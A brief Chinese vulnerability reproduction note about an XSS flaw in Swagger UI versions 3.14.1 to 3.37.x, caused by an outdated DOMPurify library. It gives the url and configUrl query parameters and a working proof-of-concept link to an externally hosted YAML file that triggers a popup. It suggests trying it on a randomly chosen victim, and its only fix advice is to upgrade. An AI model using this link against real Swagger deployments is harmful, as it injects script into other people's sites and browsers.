Linux 第十八章

swagger xss漏洞复现

文章目录

• swagger xss漏洞复现
• • 漏洞介绍
  • 影响版本
  • 实现原理
  • 漏洞复现
  • 修复建议:

漏洞介绍

Swagger UI 有一个有趣的功能，允许您提供 API 规范的 URL - 一个 yaml 或 json 文件，将被获取并显示给用户
根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本：>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗
json网站:https://jumpy-floor.surge.sh/test.yaml
拼接方式
?url=https://your_api_spec/spec.yaml
?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新